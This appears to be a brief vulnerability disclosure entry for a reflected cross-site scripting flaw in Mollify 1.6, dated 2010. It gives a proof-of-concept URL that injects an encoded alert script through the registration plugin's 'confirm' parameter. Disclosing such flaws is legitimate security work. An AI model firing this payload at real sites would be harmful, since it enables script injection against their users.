Search
Software Vulnerability Tested On Date
Mollify 1.6 Reflected Cross-site Scripting Windows Vista + XAMPP 9/15/2010
Description
A vulnerability in Mollify 1.6 can be exploited to execute arbitrary JavaScript.
Proof of Concept
http://localhost/mollify/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(0)%3C/script%3E